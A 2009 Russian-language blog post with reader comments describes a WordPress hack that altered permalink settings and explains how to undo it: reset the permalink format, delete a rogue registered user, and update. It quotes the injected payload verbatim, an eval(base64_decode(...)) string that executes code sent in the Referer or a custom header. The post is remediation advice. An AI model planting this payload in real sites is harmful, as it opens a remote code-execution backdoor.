Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)

Пятница, сентября 4, 2009 20:47

Именно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.

Выглядело это так:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Вместо нормального:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/

Гугля нашел уже 1700 сломанных блогов

Рассказываю как пофиксить , если у вас та же проблема

Идем в

Настройки->Постоянные ссылки (ЧПУ)

видим что кто то исправил вид чпу на вот такой:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Исправляем назад, на это:
/%year%/%monthnum%/%day%/%postname%/

Да и не забываем удалить последнего зарегистрировавшегося пользователя с именем
MikeWink E-mail: bugbeemershonyhe@gmail.com
Западные блоггеры говорят что это все он, у меня тоже такой был как раз последний зарегистрировавшийся, так что наверное не врут.

За одно незабываем обновляться

You can follow any responses to this entry through the RSS 2.0 feed.

You can leave a response, or trackback from your own site.

Tags: hack

11 Responses to “Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)”

Кемеровский бомж says:

сентября 4, 2009 at 21:35

У меня блог на этой неделе, также был сломан, и 1 сателлит. сижу обновляю вп на своей сетке
ZeDDy says:

сентября 4, 2009 at 22:14

Жопа в том что непонятно как пролезли, и устранена ли эта дырка в последнем WP
wlad2 says:

сентября 5, 2009 at 0:51

ты не все просчитал зайди прочитай в моем блоге..
админа второго удолить нужно
хотя может у тебя не так
ZeDDy says:

сентября 5, 2009 at 10:24

У меня второго админа не было, видимо не доломали, но на всякий случай проверил по твоей схеме, спасибо
Кемеровский бомж says:

сентября 5, 2009 at 10:44

2.8.4 тоже ломается.
На сателлитах наверное спасет, закрытие регистрации юзеров
Nataly says:

сентября 5, 2009 at 14:26

спасибо за предупреждение. полчаса проверяла свои блоги на ВП пока отписала в этом посте свою благодарность, правда нашла только на одном еще на 2,6 движке.. и юзер был такойже.. но там нет ничего ценного и на фтп пока ненашла чужого ничего )))))
Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций says:

сентября 5, 2009 at 19:22

[...] (или что-то подобное), то прочитайте вот этот материал и оперативно исправьте возникшую проблему. [...]
Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций says:

сентября 5, 2009 at 20:18

[...] (или что-то подобное), то прочитайте вот этот материал и оперативно исправьте возникшую [...]
Полат says:

сентября 6, 2009 at 16:47

Спасибо за способ решения проблемы, у меня сломали один блог, который на 2.6, пользователя с именем mikewink удалил, второго админа не было. ЧПУ поменял на такие, какие были до этого, правда после этого начались проблемы с хостингом, предполагаю что это роботы превысили допустимые лимиты нагрузки, переиндексируя ЧПУ. Добавил директиву Crawl-delay, все заработало.
ZeDDy says:

сентября 6, 2009 at 19:33

Полат , обновиться не забыл?
Yakto says:

декабря 1, 2009 at 20:03

Даже старенький wp2.3.3 и тот поломали, траффик упал в 100 раз!!!! Интересен смысл этого мероприятия: не освобождение ли позиций в выдаче? Может это Black-сео-диверсия? Были у вас ключевики в первой десятке Googla или Яши?